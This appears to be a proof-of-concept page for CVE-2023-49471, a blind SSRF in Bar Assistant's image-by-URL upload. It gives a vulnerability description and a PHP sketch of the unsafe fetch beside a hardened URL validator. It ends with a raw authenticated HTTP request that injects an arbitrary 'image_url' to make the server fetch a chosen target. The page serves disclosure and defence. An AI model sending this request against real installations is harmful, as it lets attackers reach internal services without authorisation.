
CVE-2023-49471 PoC — Bar Assistant Security Vulnerability

Source
Associated Vulnerability
Title: Bar Assistant Security Vulnerability (CVE-2023-49471)
Description: Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code.
Readme
# CVE-2023-49471

#### Vulnerability Type
Blind SSRF

#### Affected Product and Version
Bar Assistant < 3.2.0

#### Attack Vector
Authenticated users upload an image by URL to the application.

#### Description
The application does not validate the `image_url` parameter before making a request through Image::make(), so an authenticated user can make the server fetch an arbitrary URL (a Server-Side Request Forgery attack).
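The pattern behind this finding is a user-controlled URL handed straight to an image loader that fetches it. The following is an added example, not Bar Assistant's own code: it shows that unsafe pattern next to a URL check a maintainer could run before calling Image::make(). The function names (`fetchImageFromUrlUnsafe`, `isSafeImageUrl`, `fetchImageFromUrl`), the stub DNS resolver and the sample URLs are all constructed for illustration and are not taken from the project.

```php
<?php
declare(strict_types=1);

// Added example (hypothetical names, not Bar Assistant code). The real
// application passes the URL to Image::make(); file_get_contents() stands in
// for that fetch here so the sketch runs without the Intervention library.

// The vulnerable shape described on the page: nothing is checked, so the
// server will happily request loopback, link-local or internal addresses.
function fetchImageFromUrlUnsafe(string $url): string
{
    return file_get_contents($url);
}

// Hardened check: allow only http/https, refuse embedded credentials,
// resolve the host and reject anything that is not a public address.
// $resolver is injectable so the check can be exercised offline.
function isSafeImageUrl(string $url, ?callable $resolver = null): bool
{
    $resolver ??= static fn (string $host): array => gethostbynamel($host) ?: [];

    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false; // blocks file://, gopher://, ftp:// and friends
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false; // user:pass@host forms are a common parser-confusion trick
    }

    $host = trim($parts['host'], '[]'); // strip IPv6 brackets
    // A literal IP is checked as-is; a hostname is resolved to every address.
    $addresses = filter_var($host, FILTER_VALIDATE_IP) !== false
        ? [$host]
        : $resolver($host);
    if ($addresses === []) {
        return false; // unresolvable hosts are refused rather than retried
    }

    foreach ($addresses as $ip) {
        // NO_PRIV_RANGE: 10/8, 172.16/12, 192.168/16, fc00::/7
        // NO_RES_RANGE : 0/8, 127/8, 169.254/16, 240/4, ::1, ::/128, fe80::/10, ...
        $ok = filter_var(
            $ip,
            FILTER_VALIDATE_IP,
            FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
        );
        if ($ok === false) {
            return false;
        }
    }
    return true;
}

// Hardened wrapper: the fetch only happens once the URL passed the check.
function fetchImageFromUrl(string $url): string
{
    if (!isSafeImageUrl($url)) {
        throw new InvalidArgumentException('Refusing to fetch a non-public image URL');
    }
    return file_get_contents($url); // in the real app: Image::make($url)
}

// Constructed sample inputs with a stub resolver so nothing touches the network.
$stubDns = static fn (string $host): array => [
    'cdn.example'    => ['203.0.113.10'], // TEST-NET-3, stands in for a public CDN
    'intranet.local' => ['10.0.0.5'],     // resolves to a private address
][$host] ?? [];

$samples = [
    'https://cdn.example/cocktail.png',
    'http://intranet.local/status',
    'http://127.0.0.1:3000/',
    'http://[::1]/',
    'file:///tmp/image.png',
    'http://user:pw@cdn.example/x.png',
];
foreach ($samples as $u) {
    printf("%-36s %s\n", $u, isSafeImageUrl($u, $stubDns) ? 'allowed' : 'blocked');
}
```

Of the six constructed samples only the first is allowed. Two caveats for anyone adopting this: resolve the name once and connect to the address you validated (otherwise a DNS record that changes between check and fetch bypasses the test), and make sure the image library does not follow redirects on its own, since a redirect to an internal address would skip the check entirely. Logging every rejected URL together with the authenticated user is cheap and gives detection of probing against the endpoint.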

#### PoC
```
POST /bar/api/images HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------8290129562507108753887567115
Content-Length: 459
Referer: http://localhost:3000/cocktails/form
Origin: http://localhost:3000
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
authorization: Bearer 1|A3dV5SfOEqxNOY8UQmz2wDqA6ssdtBGHoVyjCFTR186abc29
Connection: close

-----------------------------8290129562507108753887567115
Content-Disposition: form-data; name="images[0][image_url]"

http://<target>/<path>
-----------------------------8290129562507108753887567115
Content-Disposition: form-data; name="images[0][copyright]"


-----------------------------8290129562507108753887567115
Content-Disposition: form-data; name="images[0][sort]"

1
-----------------------------8290129562507108753887567115--
```
File Snapshot

```
[4.0K] /data/pocs/e6be47207adde4f0790e72df8f4e79107532fa2c
└── [1.4K] README.md

0 directories, 1 file
```